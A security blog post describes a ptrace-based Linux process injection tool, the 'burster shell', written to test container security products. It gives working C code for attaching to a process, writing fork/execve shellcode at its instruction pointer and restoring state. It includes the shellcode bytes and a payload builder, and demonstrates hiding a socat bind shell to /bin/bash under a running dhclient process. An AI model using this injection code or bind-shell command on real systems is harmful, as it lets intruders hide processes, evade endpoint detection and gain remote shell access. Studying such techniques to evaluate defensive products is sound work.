I was testing the endpoint protection capabilities of a couple of COTS container security products and wanted to see how well they detected unusual interprocess memory interactions and process injection behaviors in Linux containers. I wrote a pair of short, simple programs.

The first was built without PIE, so its code sits at the same fixed address on every run. It sleeps and prints a number every 20 seconds. The second ptrace attaches to a target pid, writes a word of data at a fixed address, and detaches.

When the second program made this change in a running instance of the first, it overwrote the executable code that moves the number into the register to be printed. The first program then printed a different number. This triggered no specific detections. That seemed somewhat reasonable, as such a minor ptrace interaction would probably be indistinguishable from legitimate debugger activity.
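For reference, the core of the second test program fits in a handful of ptrace(2) requests. This is a minimal sketch, not the original program. The function name poke_word is hypothetical. The caller is assumed to already know the fixed address, which is easy to find without PIE (for example with objdump), and the replacement word.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stddef.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Hypothetical helper: attach to pid, overwrite the long-sized word at addr
 * with word, then detach. Returns 0 on success, -1 on failure (errno set). */
int poke_word(pid_t pid, unsigned long addr, unsigned long word)
{
    int status, saved_errno;
    long rc;

    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1)
        return -1;
    /* PTRACE_ATTACH sends SIGSTOP; the tracee must be stopped before poking. */
    if (waitpid(pid, &status, 0) == -1) {
        saved_errno = errno;
        ptrace(PTRACE_DETACH, pid, NULL, NULL);
        errno = saved_errno;
        return -1;
    }
    /* POKETEXT can write even to a read-only text mapping (the kernel makes a
     * private copy of the page), which is what lets the mov's immediate change. */
    rc = ptrace(PTRACE_POKETEXT, pid, (void *)addr, (void *)word);
    saved_errno = errno;
    ptrace(PTRACE_DETACH, pid, NULL, NULL);   /* resumes the tracee */
    errno = saved_errno;
    return rc == -1 ? -1 : 0;
}
```

PTRACE_POKETEXT always writes a whole long (8 bytes on x86_64). The replacement word therefore has to carry the neighboring instruction bytes unchanged, typically by reading the original word with PTRACE_PEEKTEXT first.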
I reflected for a bit on what blatantly malicious ptrace usage would look like. An argument could be made that any ptrace call in a privileged production Linux container is likely malicious, as there shouldn't be any use case for it, especially not debugging.

After thinking about what was theoretically possible based on my intermediate understanding of Linux process internals, I settled on writing a tool that spawns arbitrary new processes as children of arbitrary other processes. I would implement this with ptrace by temporarily overwriting some of the target's memory with shellcode and modifying its registers, then reverting both.
It is worth noting that this post uses a lot of terms and concepts without explaining them, and assumes a basic understanding of Linux process internals and the terminology around them.
To do this in practice, my plan was to build a tool that, once ptrace attached, writes a custom payload at the target process's instruction pointer. The payload would contain the arguments for execve and the shellcode that makes the fork and execve syscalls. After execution resumed and the fork and execve occurred, the shellcode would raise a signal in the target process. That signal would prompt the tool to write back the original memory and registers to the target process and ptrace detach.
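To do this, the following steps would occur.
1. ptrace attach to the target process and wait for it to stop.
2. Save the target's registers and the memory at its instruction pointer that the payload will overwrite.
3. Write the payload (the execve arguments followed by the shellcode) at the instruction pointer.
4. Set the registers up for the fork and execve syscalls, and point the instruction pointer at the start of the shellcode.
5. Resume the target. It forks, the child calls execve, and the parent raises a SIGTRAP.
6. When the SIGTRAP stop is observed, write back the original memory and registers, then ptrace detach.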
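The plan above maps onto a fairly short sequence of ptrace(2) requests. What follows is a condensed sketch for x86_64 Linux, not the burster shell's actual source. The function name inject_fork_exec, the 4096 byte payload cap, and the payload convention are all assumptions made to keep it self-contained. Under that convention, the argv slots hold offsets from the payload start and are rebased here once the instruction pointer is known. Handling of other signals while the shellcode runs is deliberately naive.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stddef.h>
#include <string.h>
#include <sys/types.h>

#if defined(__x86_64__) && defined(__linux__)
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <sys/wait.h>

/* Copy len bytes between buf and the tracee at addr, one long per request.
 * Each word is read first so a partial last word keeps the tracee's bytes. */
static int xfer(pid_t pid, unsigned long addr, unsigned char *buf,
                size_t len, int to_tracee)
{
    for (size_t off = 0; off < len; off += sizeof(long)) {
        size_t n = len - off < sizeof(long) ? len - off : sizeof(long);
        errno = 0;
        long word = ptrace(PTRACE_PEEKTEXT, pid, (void *)(addr + off), NULL);
        if (errno != 0)
            return -1;
        if (!to_tracee) {
            memcpy(buf + off, &word, n);
            continue;
        }
        memcpy(&word, buf + off, n);
        if (ptrace(PTRACE_POKETEXT, pid, (void *)(addr + off), (void *)word) == -1)
            return -1;
    }
    return 0;
}

/* Hypothetical driver. Payload: filename at offset 0, argc argv slots at argv_off
 * holding offsets from the payload start (assumed), shellcode at code_off.
 * Returns 0 once the parent's int3 SIGTRAP has been seen, else -1. */
int inject_fork_exec(pid_t pid, const unsigned char *payload, size_t len,
                     size_t argv_off, size_t argc, size_t code_off)
{
    struct user_regs_struct saved, regs;
    unsigned char backup[4096], buf[4096];
    int status, rc = -1;

    if (len > sizeof buf) {
        errno = E2BIG;
        return -1;
    }
    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1)
        return -1;
    if (waitpid(pid, &status, 0) == -1 ||                   /* attach stop */
        ptrace(PTRACE_GETREGS, pid, NULL, &saved) == -1 ||  /* save registers */
        xfer(pid, saved.rip, backup, len, 0) == -1)         /* save memory */
        goto detach;

    memcpy(buf, payload, len);
    for (size_t i = 0; i < argc; i++) {                     /* rebase argv slots */
        unsigned long slot;
        memcpy(&slot, buf + argv_off + i * sizeof slot, sizeof slot);
        slot += saved.rip;
        memcpy(buf + argv_off + i * sizeof slot, &slot, sizeof slot);
    }
    regs = saved;
    regs.rax = SYS_fork;               /* first syscall in the shellcode */
    regs.rdi = saved.rip;              /* execve filename */
    regs.rsi = saved.rip + argv_off;   /* execve argv */
    regs.rdx = 0;                      /* execve envp = NULL */
    regs.rip = saved.rip + code_off;   /* start of the shellcode */

    if (xfer(pid, saved.rip, buf, len, 1) == -1 ||
        ptrace(PTRACE_SETREGS, pid, NULL, &regs) == -1 ||
        ptrace(PTRACE_CONT, pid, NULL, NULL) == -1)
        goto restore;
    /* The parent branch ends in int3: wait for that SIGTRAP, passing other signals on. */
    while (waitpid(pid, &status, 0) != -1 && WIFSTOPPED(status)) {
        if (WSTOPSIG(status) == SIGTRAP) {
            rc = 0;
            break;
        }
        if (ptrace(PTRACE_CONT, pid, NULL, (void *)(long)WSTOPSIG(status)) == -1)
            break;
    }
restore:
    xfer(pid, saved.rip, backup, len, 1);       /* put the original bytes back */
    ptrace(PTRACE_SETREGS, pid, NULL, &saved);  /* and the original registers */
detach:
    ptrace(PTRACE_DETACH, pid, NULL, NULL);
    return rc;
}
#else
/* The shellcode is x86_64 machine code; refuse on anything else. */
int inject_fork_exec(pid_t pid, const unsigned char *payload, size_t len,
                     size_t argv_off, size_t argc, size_t code_off)
{
    (void)pid; (void)payload; (void)len; (void)argv_off; (void)argc; (void)code_off;
    errno = ENOSYS;
    return -1;
}
#endif
```

PTRACE_O_TRACEFORK is not set, so the child created by the injected fork is not traced. Only the parent's int3 stop is ever reported to the tracer.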
In practice, some of these steps needed additional details. I wrote this tool in C and am calling it the burster shell, as spawning a child from an unaware process can be likened to the chestbursters from Alien. The source code can be viewed here.
Early in development, instead of shellcode that forked and then called execve, I had shellcode that only called execve. That replaced the target process image entirely and required no cleanup. This seems like useful functionality, but it is not the intended goal of this tool, and it is something I may come back to.
In the final implementation, the shellcode in the source looks like the following.
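// syscall | cmp rax, 0 | jne +9 | mov rax, 0x3b | syscall | int3
// fork(); the child (rax == 0) falls through to execve, the parent jumps to int3 (SIGTRAP)
const char shellcode[] = "\x0f\x05\x48\x83\xf8\x00\x75\x09\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\xcc";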
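Disassembled, the shellcode looks like this.
0:  0f 05                   syscall
2:  48 83 f8 00             cmp    rax,0x0
6:  75 09                   jne    0x11
8:  48 c7 c0 3b 00 00 00    mov    rax,0x3b
f:  0f 05                   syscall
11: cc                      int3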
This shellcode makes a lot of assumptions about the state of the registers before it runs.

It first makes a syscall, assuming the registers are already set up for a fork syscall. It then compares the return value in rax with 0. In the parent, rax holds the child's pid (or a negative error if the fork failed), so the jump to the int3 instruction is taken, raising a SIGTRAP. In the child, fork returns 0, so the jump is not taken and rax is set to 0x3b, the syscall number of execve.

Another syscall instruction then runs. It assumes the following register values:
- rdi contains the pointer to the start of the filename in the payload.
- rsi contains the pointer to the future child's *argv[], written in the payload before the shellcode.
- rdx (*envp[]) is 0.

The syscall instruction leaves rdi, rsi, and rdx untouched, so the values set before the fork are still in place in the child. This leads to the child process making a successful execve call and replacing its image entirely, ending its execution of the shellcode.
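The jne displacement and total length are computed by hand, so a small self-check can catch mistakes when editing the shellcode. This sketch re-derives the branch target from the bytes and confirms that it lands on the int3. The name shellcode_layout_ok is hypothetical.

```c
#include <stddef.h>

/* Same bytes as the burster shell's shellcode (the string adds a trailing NUL). */
static const char shellcode[] =
    "\x0f\x05\x48\x83\xf8\x00\x75\x09\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\xcc";

/* Offsets: syscall@0, cmp@2, jne@6, mov@8, syscall@15, int3@17.
 * Returns 1 if the hand-assembled layout is consistent, 0 otherwise. */
int shellcode_layout_ok(void)
{
    const unsigned char *sc = (const unsigned char *)shellcode;
    size_t len = sizeof shellcode - 1;      /* drop the literal's trailing NUL */
    size_t jne_end = 6 + 2;                 /* rel8 is relative to the next instruction */
    size_t target = jne_end + (signed char)sc[7];

    return len == 18 &&
           sc[6] == 0x75 &&                 /* jne rel8 opcode */
           sc[11] == 0x3b &&                /* imm32 low byte: SYS_execve on x86_64 */
           target < len && sc[target] == 0xcc;  /* branch lands on int3 */
}
```

The shellcode contains NUL bytes (the first at offset 5), so it has to be copied with sizeof(shellcode) - 1 rather than strlen(shellcode). strlen would stop after five bytes.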
The full payload looks like the following. It contains the filename and argv strings (each a null-terminated char array), followed by the array of char* pointers to the argv strings.
//[filename][argv0][argv1][&argv0][&argv1][null ptr to terminate argv][nop buffer][shellcode]
If /usr/bin/sleep 20 is intended to be executed as a child of a target process, the payload is laid out as follows.
In this example, argc is 2, but an arbitrary argc is supported. The fields are:
- The filename is a null-terminated string used as the first argument of the execve syscall.
- The argv0 and argv1 values are also null-terminated strings holding the arguments of the child process to create.
- &argv0 and &argv1 are the address the payload is written to (the target's instruction pointer) plus the offsets of argv0 and argv1 within the payload.
- A null pointer follows them to terminate *argv[].
- Eight nops are placed after the "data" section of the payload as a buffer. They keep the data bytes from running together with the shellcode and being decoded as invalid or unintended instructions, which is a risk with variable-length x86_64 instructions.
- The shellcode is written last. Its start is the address the target's instruction pointer is set to before the target is resumed.
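The layout can be produced with a few memcpy calls once the target's instruction pointer is known. This is an illustration under stated assumptions, not the burster shell's code:
- build_payload is a hypothetical name.
- base is the instruction pointer read from the target, for example with PTRACE_GETREGS.
- Pointers are assumed to be 8 bytes.
- argc is capped at 63.

Every write is checked against the buffer capacity.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Build [filename][argv0]...[argvN-1][&argv0]...[&argvN-1][NULL][8 x nop][code]
 * for a payload that will be written at address base in the target.
 * Returns the total length, or 0 if it does not fit in cap. On success,
 * *argv_off and *code_off receive the offsets of the pointer array and code. */
size_t build_payload(unsigned char *buf, size_t cap, uint64_t base,
                     const char *filename, char *const argv[], size_t argc,
                     const unsigned char *code, size_t code_len,
                     size_t *argv_off, size_t *code_off)
{
    uint64_t ptrs[64];
    size_t off, n;

    if (argc >= sizeof ptrs / sizeof ptrs[0])
        return 0;
    n = strlen(filename) + 1;              /* keep the NUL terminator */
    if (n > cap)
        return 0;
    memcpy(buf, filename, n);
    off = n;
    for (size_t i = 0; i < argc; i++) {
        n = strlen(argv[i]) + 1;
        if (n > cap - off)
            return 0;
        ptrs[i] = base + off;              /* address argv[i] will have in the target */
        memcpy(buf + off, argv[i], n);
        off += n;
    }
    ptrs[argc] = 0;                        /* NULL terminates argv[] */
    n = (argc + 1) * sizeof(uint64_t);
    if (n + 8 + code_len > cap - off)
        return 0;
    *argv_off = off;
    memcpy(buf + off, ptrs, n);
    off += n;
    memset(buf + off, 0x90, 8);            /* nop buffer */
    off += 8;
    *code_off = off;
    memcpy(buf + off, code, code_len);
    return off + code_len;
}
```

Take filename "/usr/bin/sleep" with argv {"/usr/bin/sleep", "20"} and base 0x1000. The filename occupies bytes 0 to 14 and &argv0 is 0x100f. The pointer array starts at offset 33 and the shellcode at offset 65.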
The interface for this tool is styled as a shell. By default, it targets a child process that it creates at launch, but the target can be changed with the setpid [pid] shell builtin. Unlike a traditional shell, it does not spawn children of its own. It ptrace attaches to the target process and uses the previously described mechanism to spawn children of the target.
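The shell side of this can be small. The sketch below makes several assumptions:
- Tokenization splits on whitespace only, with no quoting or escaping.
- parse_line and handle_builtin are hypothetical helpers.

setpid changes the target. Any other line becomes an argv to inject into the current target.

```c
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

#define MAX_ARGS 32

/* Split line in place on spaces, tabs and newlines into a NULL-terminated
 * argv. Returns argc; words beyond MAX_ARGS - 1 are dropped. */
int parse_line(char *line, char *argv[MAX_ARGS])
{
    int argc = 0;
    for (char *tok = strtok(line, " \t\n"); tok && argc < MAX_ARGS - 1;
         tok = strtok(NULL, " \t\n"))
        argv[argc++] = tok;
    argv[argc] = NULL;
    return argc;
}

/* Handle the setpid builtin. Returns 1 if the line was a builtin (updating
 * *target when the pid parses), 0 if argv should be spawned in the target. */
int handle_builtin(int argc, char *argv[], pid_t *target)
{
    if (argc >= 1 && strcmp(argv[0], "setpid") == 0) {
        if (argc == 2) {
            char *end;
            long pid = strtol(argv[1], &end, 10);
            if (*end == '\0' && pid > 0)
                *target = (pid_t)pid;
        }
        return 1;
    }
    return 0;
}
```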
For this example demonstration, the goal is to spawn a socat bind shell as a child of the already running dhclient process. First, we run pstree to get the current process hierarchy, and then run pidof to get the pid of our target process.
We can see that the dhclient process has two children, another dhclient process and sleep. We can also see that the pid of the dhclient process we want to target is 399. We can now run the burster shell and use the setpid builtin to set the target pid to 399. From then on, any commands executed are spawned as children of the target process, dhclient, via the previously described mechanism. We can now run /usr/bin/socat -d -d TCP4-LISTEN:1337 EXEC:/bin/bash to start a socat bind shell as a child of the dhclient process.
It appears to have executed successfully, so we can exit the burster shell. We can then connect to the bind shell and execute commands successfully. Running pstree shows that the dhclient process now has a socat child process, which in turn has its own bash child process: our active bind shell.
Our bind shell will continue to run as a child of dhclient until the parent dies, it is killed, or the system is rebooted. We have successfully spawned a child process of an arbitrary process.
This implementation is very naive and has a lot of flaws. Here are some of the ones that have been identified.
When children spawned in a target process exit, the target generally does not reap them, so every exited child is leaked as a zombie process. This is unfortunate, and without injecting long-lived code into the target process, I am unaware of a way to handle this.
This is why there is a sleep child of the dhclient process in the demonstration section. It was a zombie left by a previous test, and I have no way to clean it up.
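The demonstration relied on two things pstree showed: a process's parent, and whether a process is a zombie. Both come from /proc/[pid]/stat, so they can be checked programmatically.

This sketch uses hypothetical names proc_stat and zombie_demo. It reads both fields, then reproduces a leaked child locally. A child exits and stays in the process table as a zombie (state Z) until its parent calls waitpid. waitid with WNOWAIT waits for the exit without reaping it.

```c
#define _GNU_SOURCE
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Read the state letter ('R', 'S', 'Z', ...) and parent pid from
 * /proc/<pid>/stat. Returns 0 on success, -1 on failure. comm (field 2) is
 * parenthesised and may contain spaces, so parsing starts after the last ')'. */
int proc_stat(pid_t pid, char *state, pid_t *ppid)
{
    char path[64], line[1024];
    int pp;

    snprintf(path, sizeof path, "/proc/%d/stat", (int)pid);
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    char *ok = fgets(line, sizeof line, f);
    fclose(f);
    char *rparen = ok ? strrchr(line, ')') : NULL;
    if (!rparen || sscanf(rparen + 1, " %c %d", state, &pp) != 2)
        return -1;
    *ppid = (pid_t)pp;
    return 0;
}

/* Fork a child that exits at once, wait for the exit WITHOUT reaping it,
 * record its state, then reap it. Returns the observed state ('Z') or 0. */
char zombie_demo(void)
{
    siginfo_t info;
    char state = 0;
    pid_t ppid;

    pid_t child = fork();
    if (child == -1)
        return 0;
    if (child == 0)
        _exit(0);
    if (waitid(P_PID, (id_t)child, &info, WEXITED | WNOWAIT) == 0 &&
        proc_stat(child, &state, &ppid) == -1)
        state = 0;
    waitpid(child, NULL, 0);  /* reap it: the step the target never performs here */
    return state;
}
```

For the demonstration, proc_stat on the socat pid would be expected to report dhclient's pid (399) as its parent.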
The execve syscall is deliberately made with a null *envp[] pointer. It is difficult to say what *envp[] should even be. Should the burster shell's *envp[] be copied into the payload, like the target *argv[] is? Should the burster shell introspect the target process's stack frames to find its *envp[] address and use that? Either way, additional code would have to be written, and new problems would crop up in the details.
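One more possible source of the target's environment: Linux exposes a process's environment as NUL-separated KEY=VALUE strings in /proc/[pid]/environ. It reflects the environment set up at exec time, not later setenv(3) changes. It could be copied into the payload the same way *argv[] is.

This is only a hedged sketch of reading and splitting it. The names read_environ and split_environ are hypothetical. Building the pointer array would work like the argv one.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Split len bytes of NUL-separated KEY=VALUE strings (the /proc/<pid>/environ
 * format) into vars, which must have room for max >= 1 entries including the
 * terminating NULL. Returns the number of variables stored. */
size_t split_environ(char *buf, size_t len, char **vars, size_t max)
{
    size_t n = 0, off = 0;

    while (off < len && n + 1 < max) {
        vars[n++] = buf + off;
        off += strnlen(buf + off, len - off) + 1;  /* step past the NUL */
    }
    vars[n] = NULL;
    return n;
}

/* Read /proc/<pid>/environ into buf (at most cap - 1 bytes, then NUL-terminate
 * so a truncated last entry is still a valid string). Returns bytes read or -1.
 * Access is governed by a ptrace access mode check (see proc(5)). */
long read_environ(pid_t pid, char *buf, size_t cap)
{
    char path[64];
    FILE *f;
    size_t n;

    if (cap == 0)
        return -1;
    snprintf(path, sizeof path, "/proc/%d/environ", (int)pid);
    if (!(f = fopen(path, "r")))
        return -1;
    n = fread(buf, 1, cap - 1, f);
    fclose(f);
    buf[n] = '\0';
    return (long)n;
}
```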
As a C program, this shell sucks. There are blind memcpy(3) calls that can easily overflow the fixed-length buffers on the stack. The arrays that some of the target process data gets read into are also fixed length. There are bad practices and bad code throughout, but ultimately this is meant to be a quick and useful proof of concept tool.
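The blind memcpy(3) calls are the easiest of these to fix. Every copy into a fixed-size buffer can go through a helper that checks the remaining space first. This is a minimal sketch; append_bounded is a hypothetical name.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Append len bytes of src to buf at *off if they fit within cap.
 * On success advances *off and returns true; on overflow copies nothing. */
bool append_bounded(unsigned char *buf, size_t cap, size_t *off,
                    const void *src, size_t len)
{
    /* Compare against the remaining space so the check itself cannot wrap. */
    if (*off > cap || len > cap - *off)
        return false;
    memcpy(buf + *off, src, len);
    *off += len;
    return true;
}
```

The check compares len against cap - *off rather than *off + len against cap. The sum could wrap around for a huge len and pass the check.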
As a shell, this shell sucks. I'd like readline or similar support, some ways to control certain *envp[] values passed to children, more shell builtins, piping (this could be a nightmare), a way to escape spaces and wrap things in quotes, and just generally more niceties expected of a usable shell.
This code is aggressively non-portable. The shellcode assumes x86_64. The syscall numbers and register usage assume the Linux x86_64 syscall ABI. A long is assumed to be the same size as a pointer, which is assumed to be 8 bytes.
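These assumptions could at least be made to fail loudly instead of silently. This sketch assumes C11 _Static_assert support; the function name shellcode_arch_ok is hypothetical.

```c
#include <stddef.h>

/* PTRACE_PEEKTEXT/POKETEXT move one long per request, and the payload stores
 * argv pointers in 8-byte slots, so refuse to build if either assumption breaks. */
_Static_assert(sizeof(long) == sizeof(void *), "long must be pointer-sized");
_Static_assert(sizeof(void *) == 8, "payload pointer slots assume 8-byte pointers");

#if !defined(__linux__)
#error "ptrace usage and syscall numbers here assume Linux"
#endif

/* The shellcode bytes and syscall numbers (fork = 57, execve = 59) are
 * x86_64-specific, so injection should be refused on other architectures. */
int shellcode_arch_ok(void)
{
#if defined(__x86_64__)
    return 1;
#else
    return 0;
#endif
}
```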
The burster shell assumes that, at the time it attaches to a target process, there is enough executable memory after the instruction pointer to hold the entire payload. This could be made safe with two changes:
- Cap the payload at one page (4096 bytes, the typical page size on Linux).
- Write the payload at the start of the page containing the instruction pointer (the instruction pointer rounded down to a page boundary) instead of at the instruction pointer itself.
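The page-aligned alternative is simple arithmetic: clear the low bits of the instruction pointer. This sketch assumes a power-of-two page size, which would normally come from sysconf(_SC_PAGESIZE). The name payload_addr is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Return the address to write the payload at: the start of the page that
 * contains rip. That page is executable, since rip is executing in it.
 * Returns 0 if the payload would spill past the end of that page. */
uint64_t payload_addr(uint64_t rip, size_t len, uint64_t page_size)
{
    uint64_t start = rip & ~(page_size - 1);   /* page_size must be a power of two */
    return len <= page_size ? start : 0;
}
```

With a 4096-byte page, an instruction pointer of 0x401136 gives a write address of 0x401000. The shellcode's entry point then becomes that address plus the shellcode offset rather than the original instruction pointer. The original bytes of that page range still have to be saved and restored.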
In the case where this assumption fails, the target process will segfault when running the shellcode. In practice, I have yet to see this occur.
This project started as an unnecessarily deep dive into evaluating COTS container security runtime products. It led me to a better understanding of Linux processes and ptrace, as well as a usable proof of concept process injection shell.

I am deliberately not including any details, drawing any conclusions, or naming any vendors regarding how the container security products detected this tool's process injection behaviors in Linux containers with the ptrace capability. In short, I was not impressed.
In the future, I may use this tool for interesting post-exploitation trickery, and generally break it out as a cool party trick on occasions that call for it. Actually implementing my idea let me confirm a lot of my understanding of Linux process internals, and I am surprised that it ended up working the way I thought it would.